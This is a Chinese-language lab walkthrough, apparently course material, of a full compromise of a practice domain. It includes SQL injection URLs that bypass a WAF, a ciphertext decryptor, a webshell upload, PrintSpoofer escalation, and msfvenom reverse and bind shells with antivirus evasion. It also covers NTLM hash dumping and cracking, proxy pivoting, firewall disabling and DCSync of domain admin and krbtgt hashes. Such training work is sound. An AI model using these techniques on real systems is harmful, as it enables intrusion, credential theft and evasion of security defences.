1. 环境说明................................................................................................................... 2

1.1. 文章说明...................................................................................................... 2

1.2. 靶场搭建...................................................................................................... 3

1.3. 靶场拓扑图.................................................................................................. 5

2. 测试过程................................................................................................................... 5

2.1. netdiscover 探测内网............................................................................ 5

2.2. 服务器端口扫描...................................................................................... 6

2.2.1. masscan 扫描................................................................................... 6

2.2.2. nmap探测端口信息............................................................................ 6

2.2.3. 美化nmap报告结果.......................................................................... 7

2.3. 绑定hosts域名........................................................................................... 8

2.4. 目录扫描...................................................................................................... 9

2.4.1. python编程简单的目录扫描脚本..................................................... 9

2.5. siteserver漏洞利用.................................................................................... 11

2.6. 绕过安全狗注入........................................................................................ 12

2.7. 反编译.net dll文件................................................................................... 14

2.8. 编写c# siteserver 密文解密工具............................................................. 15

2.9. 找回密码漏洞............................................................................................ 19

2.10. siteserver 后台getshell........................................................................... 20

2.11. WindowsServer 2016 提权.................................................................... 21

2.11.1. Windows Server 2016 信息收集.................................................... 21

2.11.2. PrintSpoofer 提权Windows Server 2016....................................... 23

2.12. msf shellcode绕过 windows defender查杀......................................... 24

2.12.1. msf生成payload............................................................................. 24

2.12.2. shellcode免杀过defender.............................................................. 24

2.12.3. msf监听........................................................................................... 25

2.12.4. 得到session.................................................................................... 25

2.13. 收集hash 明文....................................................................................... 26

2.14. ntml破解................................................................................................. 27

2.15. hashat字典破解ntml.............................................................................. 27

2.16. 登录远程桌面.......................................................................................... 28

2.17. 内网渗透.................................................................................................. 28

2.18. WEB服务器信息收集............................................................................ 28

2.19. 跨网段横行渗透...................................................................................... 29

2.19.1. 内网ping协议发现主机................................................................ 29

2.19.2. msf arp发现主机............................................................................. 29

2.19.3. msf socks4a proxychains 穿透内网................................................ 29

2.19.4. proxychains nmap扫描内网............................................................ 30

2.19.5. proxychains 调用火狐访问内网.................................................... 30

2.19.6. 通达上传漏洞GETSHELL........................................................... 31

2.19.7. 配置中国蚁剑代理内网连接shell................................................ 32

2.19.8. 收集oa服务器信息....................................................................... 32

2.19.9. 命令行关闭Windows Firewall...................................................... 38

2.19.10. 免杀过360全家桶....................................................................... 38

2.19.11. msf正向链接oa............................................................................ 39

2.20. 内网域渗透.............................................................................................. 41

2.20.1. 定位域控......................................................................................... 42

2.20.2. 跨网段探测DC端口..................................................................... 44

2.21. kiwi域管ntml......................................................................................... 45

2.21.1. mimikatz免杀过360全家桶.......................................................... 46

2.21.2. 在线破解域控ntml........................................................................ 48

2.21.3. SocksCap 设置代理登录域控........................................................ 48

2.21.4. 得到域控的flag............................................................................. 49

3. 总结......................................................................................................................... 50

4. 关注......................................................................................................................... 50

5. 培训网站................................................................................................................. 51

1.  环境说明

1.1.  文章说明

这个靶场是attack，是moonsec培训用的一个靶场，因为是视频教学，所以本文是技术文档，过程不会太详细说明，可能会让萌新产生难以理解，如需学习整套体系可以联系暗月学习。这个靶场目标是获取域控下的flag.txt，想要获取域控的最终flag需要运用很多技能，如果能把这个靶场通关了，去任何一家安全公司做红队测试应该不是什么问题，我的培训体系 https://edu.moonsec.com

1.2.  靶场搭建

attack靶场环境是用VMware Workstation 搭建，把环境文件下载后，用VMware Workstation 编辑虚拟网络编辑器即可正常访问。

WEB服务器是双网卡

第一块网卡桥接 ip段是192.168.0.0/24

第二块网卡 vmnet1810.10.1.0/24

oa服务器

第一块网卡 vmnet1810.10.1.0/24

第二块网卡 vmnet1910.10.10.0/24

dc域控                           

网卡 vmnet1910.10.10.0/24

如图

1.3.  靶场拓扑图

2.  测试过程

2.1.  netdiscover 探测内网

netdiscover -i eth0 -r 192.168.0.0/24

192.168.0.114 是要渗透的ip

2.2.  服务器端口扫描

2.2.1. masscan 扫描

因为服务器上安全防护软件 尽量把rate的值调低 掉调大可能会被封

masscan 192.168.0.114 -p 1-65535 --rate=100

2.2.2. nmap探测端口信息

nmap -sV -p 3389,5985,6588,999,21,80 -A 192.168.0.114 -oA attack-ports

2.2.3. 美化nmap报告结果

xsltproc -o attack.html mode.xsl attack-ports.xml

mode.xsl 是报告的模板

attack.html是美化后的报告结果

attack-ports.xml这是nmap保存的结果

2.3.  绑定hosts域名

这个靶场web服务器的域名是www.moonlab.com 在hosts绑定对应的IP方能访问web服务。

linux系统 /etc/hosts

windows C:WindowsSystem32driversetchosts

192.168.0.114 www.moonlab.com

绑定后访问

2.4.  目录扫描

因为有防火墙所以先把线程调低 并发请求过多，会当作cc攻击拉黑处理。

一般被拉黑就要等十分钟后再扫描

2.4.1. python编程简单的目录扫描脚本

#conding:utf-8import requestsimport timewith open('big.txt', 'r',encoding='UTF-8') as readfile:    for dirs in readfile.readlines():        url = 'http://www.moonlab.com/'+dirs.strip('n')        resp = requests.get(url)        strlen = len(resp.text)        print(url+'--'+str(resp.status_code)+'---len--'+str(strlen))        time.sleep(0.5)        if resp.status_code == 200 or resp.status_code == 403 or resp.status_code == 301 or resp.status_code == 500:            with open('write.txt', 'a', encoding='UTF-8') as writefile:                writefile.write(url+'--'+str(resp.status_code)+'---len--'+str(strlen)+'n')                writefile.close()

弄了个脚本扫描出来存在http://www.moolab.com/siteserver

2.5.  siteserver漏洞利用

siteserver 曾经爆出过很多漏洞，而且当前的版本比较低，直接用扫描器打。可以都被防护软件链接了，估计是请求较多，语句具有一定危险性都被拦截了。需要更改脚本。https://github.com/johnniesong/w9scan/blob/master/plugins/2739.py

这个是siteserver 检测脚本，自己修改一下。

‍#conding:utf-8import requestsps = [        '/siteserver/service/background_taskLog.aspx?Keyword=test%%27%20and%20convert(int,(char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version))=1%20and%202=%271&DateFrom=&DateTo=&IsSuccess=All',        '/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=2;%20--',        '/siteserver/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%202=%271',        '/siteserver/userRole/background_administrator.aspx?RoleName=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%271&PageNum=0&Keyword=test&AreaID=0&LastActivityDate=0&Order=UserName',        '/siteserver/userRole/background_user.aspx?PageNum=0&Keyword=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%27&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0',        '/siteserver/bbs/background_thread.aspx?UserName=test&Title=%27%20and%201=char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version%20and%201=%27&DateFrom=&DateTo=&ForumID=0',    ]url='http://www.moonlab.com'for p in ps:    req = requests.get(url+p)    if req.status_code == 500 and "GAOJIMicrosoft" in req.text:        print(url+p)        print(req.text)

2.6.  绕过安全狗注入

安全狗会对常规的SQL注入会进行拦截。

数据库版本

http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20~1=@@version;%20--

Microsoft SQLServer 2008 R2 (SP2)

数据库名

http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20~1=db_name();%20--

msmoonlab

用户密码 key

用户 admin

http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20~1=(select%20top%201%20username%20from%20[bairong_Administrator]);%20--

密文 64Cic1ERUP9n2OzxuKl9Tw==

http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20~1=(select%20top%201%20password%20from%20[bairong_Administrator]);%20--

keyLIywB/zHFDTuEA1LU53Opg==

http://www.moonlab.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20~1=(select%20top%201%20PasswordSalt%20from%20[bairong_Administrator]);%20--

2.7.  反编译.net dll文件

反编译dll主要用来查看网站的源码，这里主要是找到用户的加密方法。

siteserver/login.aspx找到对应的dll文件位置

<%@ PageLanguage="C#" Inherits="UserCenter.Pages.LoginPage" %>

通过dnSpy反编译得到加密文件

密文的加密方式是 desc对称加密

public void DesEncrypt()    {      byte[] rgbIV = new byte[]      {        18,        52,        86,        120,        144,        171,        205,        239      };      try      {        byte[] bytes = Encoding.UTF8.GetBytes((this.x39d9653625493ae8.Length > 8) ? this.x39d9653625493ae8.Substring(0, 8) : this.x39d9653625493ae8);        DESCryptoServiceProvider descryptoServiceProvider = new DESCryptoServiceProvider();        byte[] bytes2 = Encoding.UTF8.GetBytes(this.x3c811436980dcf17);        MemoryStream memoryStream = new MemoryStream();        CryptoStream cryptoStream = new CryptoStream(memoryStream, descryptoServiceProvider.CreateEncryptor(bytes, rgbIV), CryptoStreamMode.Write);        cryptoStream.Write(bytes2, 0, bytes2.Length);        cryptoStream.FlushFinalBlock();        if (!false)        {        }        this.xc7d800b8a71773fd = Convert.ToBase64String(memoryStream.ToArray());      }      catch (Exception ex)      {        this.x456956327593d9f6 = ex.Message;      }    }

2.8.  编写c# siteserver 密文解密工具

在dnSpy存在解密源码DesDecrypt方法

public void DesDecrypt(){  byte[] rgbIV = new byte[]  {18,52,86,120,144,171,205,239  };  byte[] array = new byte[this.x3c811436980dcf17.Length];  try  {byte[] bytes = Encoding.UTF8.GetBytes(this.x6d0b493f217f133b.Substring(0, 8));DESCryptoServiceProvider descryptoServiceProvider = new DESCryptoServiceProvider();array = Convert.FromBase64String(this.x3c811436980dcf17);MemoryStream memoryStream = new MemoryStream();if (!false){}CryptoStream cryptoStream = new CryptoStream(memoryStream, descryptoServiceProvider.CreateDecryptor(bytes, rgbIV), CryptoStreamMode.Write);cryptoStream.Write(array, 0, array.Length);cryptoStream.FlushFinalBlock();Encoding encoding = new UTF8Encoding();this.xc7d800b8a71773fd = encoding.GetString(memoryStream.ToArray());  }  catch (Exception ex)  {this.x456956327593d9f6 = ex.Message;  }}this.x456956327593d9f6 

using System;using System.Collections.Generic;using System.ComponentModel;using System.Data;using System.Drawing;using System.IO;using System.Linq;using System.Security.Cryptography;using System.Text;using System.Windows.Forms;
namespace siteserver明文解密工具{    public partial class Form1 : Form    {        public Form1(){            InitializeComponent();        }
        public void DesDecrypt(){            byte[] rgbIV = new byte[]      {        18,        52,        86,        120,        144,        171,        205,        239      };            byte[] array = new byte[this.textBox1.Text.Length];            try            {                byte[] bytes = Encoding.UTF8.GetBytes(this.textBox2.Text.Substring(0, 8));                DESCryptoServiceProvider descryptoServiceProvider = new DESCryptoServiceProvider();                array = Convert.FromBase64String(this.textBox1.Text);                MemoryStream memoryStream = new MemoryStream();                if (!false)                {                }                CryptoStream cryptoStream = new CryptoStream(memoryStream, descryptoServiceProvider.CreateDecryptor(bytes, rgbIV), CryptoStreamMode.Write);                cryptoStream.Write(array, 0, array.Length);                cryptoStream.FlushFinalBlock();                Encoding encoding = new UTF8Encoding();                this.textBox3.Text = encoding.GetString(memoryStream.ToArray());            }            catch (Exception ex)            {                this.textBox4.Text = ex.Message;            }        }

        private void button1_Click(object sender, EventArgs e){            DesDecrypt();        }    }}

2.9.  找回密码漏洞

找回密码把回答为空即可有明文密码

2.10.  siteserver 后台getshell

在后台导入模板上传zip文件 即可获取一个webshell，因为存在安全狗普通的shell和一句话都会被拦截，所以这使用暗月内部的过狗刀。

http://www.moonlab.com/sitefiles/sitetemplates/c32as/c32as.aspx

2.11.  Windows Server 2016 提权

2.11.1. Windows Server 2016 信息收集

查看当前用户 名字和ip信息

查看进程服务器 收集安全防护软件信息

存在的防护软件

1.       iis安全狗

2.       服务器安全狗

3.       windows firewall

4.       windows defender

2.11.2. PrintSpoofer 提权Windows Server2016

工具下载地址 https://github.com/itm4n/PrintSpoofer

当前权限是system 服务器上装有多个防护 服务器安全狗，增加用户会被拦截。最好是直接上远控，但是 windowsserver 2016 自带杀软 defender 远控或者shellode都会被查杀，所以要做免杀处理。

2.12.  msf shellcode绕过 windows defender查杀

2.12.1. msf生成payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.122  LPORT=2333 -e x86/shikata_ga_nai  -i 15 -f csharp -o payload.txt

2.12.2. shellcode免杀过defender

免杀过了火绒了 defender 也是完美过。

2.12.3. msf监听

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.0.122set lport 2333exploit -j

 2.12.4. 得到session

plus.txt -i -c "dc.exe"

迁移进程后 做后渗透处理

2.13.  收集hash 明文

在msf loadmimikatz 无法获取明文，hash允许获取

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e7114141b0337bdce1aedf5594706205:::

DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

huweishen166644:1004:aad3b435b51404eeaad3b435b51404ee:93a50f03c4bc59579605ee0c1937401a:::

moonlab:1010:aad3b435b51404eeaad3b435b51404ee:16607206dae8e7ac67ccbbce40363686:::

MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:c5bf79ff3e413dd56c626aaed26431bb:::

PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:8ad7000c1e4378339c86952dd7dc23e1:::

2.14.  ntml破解

Administrator ntmle7114141b0337bdce1aedf5594706205

在cmd5得到明文。

!@#QWE123

2.15.  hashat字典破解ntml

hashcat -a 0 -m1000 hash.txt rockyou.txt --force

-a 0 字典模式

-m 是类型

hash.txt是ntml

rockyou是字典

2.16.  登录远程桌面

mstsc 输入IP 账号和密码即可登录。

2.17.  内网渗透

2.18.  WEB服务器信息收集

l  IP 192.168.0.114 10.10.1.131

l  账号信息 Administrator !@#QWE123

目前渗透的进度

2.19.  跨网段横行渗透

2.19.1. 内网ping协议发现主机

对 10.10.1.0/24进行横向渗透 首先获取这个段下的pc

查询10.10.1.0/24存活的IP

for /l %i  in (1,1,255) do @  ping 10.0.1.%i  -w  1 -n  1 |  find  /i  "ttl="

2.19.2. msf arp发现主机

run arp_scanner -r 10.10.1.0/24

2.19.3. msf socks4a proxychains 穿透内网

msf添加路由

run autoroute -s10.10.1.0/24use auxiliary/server/socks4aset SRVPORT  3333runvi /etc/proxychains.confsocks4  192.168.0.122 3333

2.19.4 proxychains nmap扫描内网

proxychains nmap -sT -Pn 10.10.1.130 -p 80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,6379,7001,7002,9200,9300 ,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389 --open

目前只能访问80端口 估计是做了端口访问控制。

2.19.5. proxychains 调用火狐访问内网

roxychains firefox -sT -Pn 10.10.1.130 -p 80

访问端口发现是通达os网络智能办公系统。

2.19.6. 通达上传漏洞GETSHELL

proxychains3 python3 tongda_shell.py http://10.10.1.130

用默认的shell会被查杀，用中国蚁剑生成的shell不会被查杀

在base64编码后 修改脚本原来的shell

2.19.7. 配置中国蚁剑代理内网连接shell

2.19.8. 收集oa服务器信息

收集整理有用的信息 操作的时候小心，尽量避免打草惊蛇。

当前是系统权限 system

在运行的服务

进程列表

端口连接信息

网卡信息

信息整理

oa 服务器存在两个IP 分别是 10.10.1.130 10.10.10.166

防护软件内置系统防火墙Windows Firewall  360安全卫士 360杀毒软件

2.19.9. 命令行关闭WindowsFirewall

NetSh Advfirewall set allprofiles state off

现在可以访问除80以外的端口，可以正向连接oa服务器 再进行其他操作深入的操作。

2.19.10. 免杀过360全家桶

生成正向连接shellcode

msfvenom -p windows/meterpreter/bind_tcp LPORT=6666 -e x86/shikata_ga_nai -i 15 -f csharp -o payload_bind.txt

再用工具免杀 上传到oa服务器上执行 再查看进行是否被360查杀

静态是过360 行为还不知道拦截不 目前还清楚。

2.19.11. msf正向链接oa

msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcppayload => windows/meterpreter/bind_tcpmsf5 exploit(multi/handler) > show optionsmsf5 exploit(multi/handler) > set rhost 10.10.1.130rhost => 10.10.1.130msf5 exploit(multi/handler) > set lport 6666lport => 6666exploit

得到oa的seesion 接下来就是收集服务器信息了。

网卡信息

hashdump

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:357bec0ee1f524c62ba536fcd3f74472:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

load mimikatz

AuthID    Package    Domain          User           Password

------    -------    ------          ----           --------

0;2696023 Negotiate  Window Manager  DWM-3         n.a. (msv1_0 KO)

0;1854043 Kerberos   ATTACK          administrator  n.a. (msv1_0 KO)

0;538367  Kerberos   ATTACK          oa             n.a. (msv1_0 KO)

0;996      Negotiate ATTACK          OA$            n.a. (msv1_0 KO)

0;2731063 Kerberos   ATTACK          oa             n.a. (msv1_0 KO)

0;997     Negotiate  NT AUTHORITY    LOCAL SERVICE  n.a. (msv1_0 KO)

0;53502   NTLM                                     n.a. (msv1_0 KO)

0;999     Negotiate  ATTACK          OA$            n.a. (msv1_0 KO)

存在attack域 看来是域管理登录过的 访问用户目录存在域管理用户目录

把信息收集完毕接下来就是进行内网域控的渗透。

2.20.  内网域渗透

目前渗透进度 web服务器 到 oa办公系统服务器 下一步进行域控的渗透。

目前oa办公的权限是system 权限较高

2.20.1. 定位域控

在使用命令的期间发现session多次失败，可以确定web服务器有些防护软件会对操作进行拦截

登录服务器把服务器安全狗进行关闭或者停止主动防御。

C:WindowsTemp>net time

net time

Current time at\dc.attack.local is 2020/8/12 14:39:0

The commandcompleted successfully.

meterpreter >run post/windows/gather/enum_domain

[+] FOUNDDomain: attack

[+] FOUND DomainController: dc (IP: 10.10.10.165)

域内PC

登录的用户

组信息

进程存在域管理员

存在域管理员

2.20.2. 跨网段探测DC端口

meterpreter > run autoroute -s 10.10.10.0/2

[!] Meterpreter scripts are deprecated. Trypost/multi/manage/autoroute.

[!] Example: run post/multi/manage/autorouteOPTION=value [...]

[*] Adding a route to10.10.10.0/255.255.255.0...

[+] Added route to 10.10.10.0/255.255.255.0via 10.10.1.130

[*] Use the -p option to list all activeroutes

proxychains nmap -sT -Pn 10.10.10.165 -p 80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,88,6379,7001,7002,9200,9300,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389 --open

3389端口是开放的

445 也是开放的

2.21.  kiwi域管ntml

获取域控的权限

dcsync_ntlmadministrator

meterpreter > getuid

Server username: ATTACKadministrator

meterpreter > dcsync_ntlm administrator

[+] Account   : administrator

[+] NTLM Hash : 15132c3d36a7e5d7905e02b478979046

[+] LM Hash   : <NOTFOUND>

[+] SID       :S-1-5-21-4052809752-717748265-227546684-500

[+] RID       : 500

meterpreter > dcsync_ntlm krbtgt

[+] Account   : krbtgt

[+] NTLM Hash : 67446f76100703cc0866cb7167cca084

[+] LM Hash   :c7192cc0c2c01aee95bc9a98664ed15b

[+] SID       :S-1-5-21-4052809752-717748265-227546684-502

[+] RID       : 502

2.21.1. mimikatz免杀过360全家桶

msf里的mimikatz虽然很全，但是一些操作还会被拦截，而且好似没有pth

这是c#版本的mimikatz有一个详细说明如果是生成exe会被杀的

https://github.com/ssssanr/Mimikatz-Csharp

dll完全不会行为查杀 并不会拦截

C:/Windows/Microsoft.NET/Framework/v4.0.30319/RegSvcs.exeregsvcs.dll

用pth登录域控失败。

2.21.2. 在线破解域控ntml

在线网站www.cmd5.com

国外网站 https://www.objectif-securite.ch/ophcrack

2.21.3. SocksCap 设置代理登录域控

如果域控只允许windows主机登录 kali的rdesktop会登录不上

所以使用windows自带的mstsc 因为是内网所以先设置代理。

类型选择socks4

启动后填写ip 输入账号和密码即可

2.21.4. 得到域控的flag

1.  总结

完成后的图

本文是一个的从外网渗透内网域控的案例文章，从实际的环境里搬过来学习的。希望能给一些学习全栈渗透的老表带来一些思路。案例虽然很多技术和应用还是没有展示出来，下次我再用其他的技术和技巧，分享给老表们，文章里有很些工具不方便分享出来，抱歉。

1.  关注

1.  培训网站

暗月安全培训https://edu.moonsec.com